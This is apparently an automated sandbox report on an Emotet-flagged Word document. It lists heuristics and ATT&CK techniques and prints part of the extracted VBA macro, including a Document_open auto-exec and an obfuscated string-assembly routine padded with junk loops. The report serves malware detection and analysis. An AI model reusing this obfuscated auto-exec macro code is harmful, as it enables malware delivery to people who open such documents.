Verdict: MALICIOUS
Risk Score: 202
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV with the signature 'Doc.Malware.Emotet-7540219-0', strongly indicating the Emotet family. Static analysis revealed the presence of VBA macros, specifically a 'Document_Open' macro that utilizes a 'GetObject' call, a common technique for executing malicious code. The VBA code appears obfuscated but the presence of these elements suggests the macro's purpose is to download and execute a second-stage payload.
Heuristics (6)
- ClamAV: Doc.Malware.Emotet-7540219-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Emotet-7540219-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11139 bytes |

SHA-256 of macros.bas: e27417742d7119688d67fc189fe3abeeca8bc8bb5082e13849168b82b627a447

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Rncwejxkc"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Iiyvvjoo
End Sub
Attribute VB_Name = "Whaeodtqkqi"
Attribute VB_Base = "0{52D0F05A-089C-4C08-9B1B-AB764DB4D7B5}{36B4AEC5-77EA-4BAB-AC54-D80C3EA04A94}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Aplhseob"
Function Yenwuidyxwz()
Do While Jmgtmxgu = 9875
Do While Okladkfofrymd = 34
Fvatlefspdlgu = Cos(8 + CStr(750))
Loop
Do While Nfotlpltbvw = 123
Kewjjwhbf = Vjswwrelcoet
Khuczxoeyi = 3253
Loop
Do While Cwyfohevy = 667
Owjrlxrfkyzzo = CDbl(324)
Gceqkjkqphnwa = Int(496)
Loop
Do While Clikffpgdhh = 2342
Hcxjsobb = CInt(Soegujyar)
Loop
Do While Woqdhtrwbidhj = 3247
Jdelvnkcpwa = Sgn(713)
Xegpsekngfku = CByte(Qzoguxhzv + Oimmbhguw)
Loop
Loop
Bhmfieewqmax = ChrW(wdKeyP)
Do While Uaufrffcie = 9875
Do While Hyhfzjzzj = 34
Ztebuipda = Cos(8 + CStr(750))
Loop
Do While Ijpugstoh = 123
Sxbpmdwclzvvu = Elutaeeapx
Cggvsldah = 3253
Loop
Do While Vlhyqgmou = 667
Nitntrnwlswz = CDbl(324)
Fedjqleegyht = Int(496)
Loop
Do While Ucjvvitybes = 2342
Lomzmndlcj = CInt(Xpjbvgzk)
Loop
Do While Iibdlchc = 3247
Eytqtzufddr = Sgn(713)
Rysjwgysc = CByte(Fdxjcadzkn + Wtivlugwkqeke)
Loop
Loop
Yzofkzbu = Bhmfieewqmax + Whaeodtqkqi.Ekqdonwu + Whaeodtqkqi.Wnbyoebd
Do While Qnfrughmtanf = 9875
Do While Wnrtcnbetzjp = 34
Kzrnucvavp = Cos(8 + CStr(750))
Loop
Do While Oevffomw = 123
Ctgutmtgied = Tjzkswws
Zzxinuudhjvx = 3253
Loop
Do While Aiihpgvar = 667
Wfetaewz = CDbl(324)
Vvdflnbwn = Int(496)
Loop
Do While Lskjnodvyzivg = 2342
Qkgezxyafnf = CInt(Stddwfln)
Loop
Do While Mptebhmzxo = 3247
Rpjgynrewinzc = Sgn(713)
Ezagbvauogtw = CByte(Nimgvcouphxv + Dctcwliawi)
Loop
Loop
Ctnwawndbnwwg = Split(Yzofkzbu + LTrim(LTrim(Whaeodtqkqi.Zazqvyncyowi. _
Tag)), ",,,,sdf7&&jsad,,,")
Do While Lmwfcmwjdvx = 9875
Do While Rborgbgodrg = 34
Nvlzgssowbrl = Cos(8 + CStr(750))
Loop
Do While Aftmqgvtudj = 123
Daiuqzjz = Doeqcuzwfsmgi
Pzxtbipfs = 3253
Loop
Do While Ogaleqyhpym = 667
Yugeiowrypbz = CDbl(324)
Apojmbogs = Int(496)
Loop
Do While Owibtgcjfvgc = 2342
Etwprzltkyrbp = CInt(Erbkkuroqfi)
Loop
Do While Fjtncmihrrb = 3247
Uljkrrcvb = Sgn(713)
Rbbmfgkjb = CByte(Aedzcrgmazn + Fegnqvuegovbk)
Loop
Loop
Yenwuidyxwz = Zlcfvwfxnhb + Join(Ctnwawndbnwwg, "") + Zlcfvwfxnhb
Do While Jhbqjhfftekb = 9875
Do While Vvdulhuz = 34
Kiirqgyi = Cos(8 + CStr(750))
Loop
Do While Ogjwzpfdphryb = 123
Zpwvibkf = Bznonfcsb
Mgvvbqjvjlg = 3253
Loop
Do While Rqcmaxebirx = 667
Obbpgaymmjbz = CDbl(324)
Ajrtuewxxd = Int(496)
Loop
Do While Dlmeoxfjciuu = 2342
Weehanumd = CInt(Yclwqexzown)
Loop
Do While Uduwispxoo = 3247
Tpcbxqhunqvt = Sgn(713)
Dwuqkievnx = CByte(Elcskodexpvyr + Fvdiajwot)
Loop
Loop
End Function
Fun
... (truncated)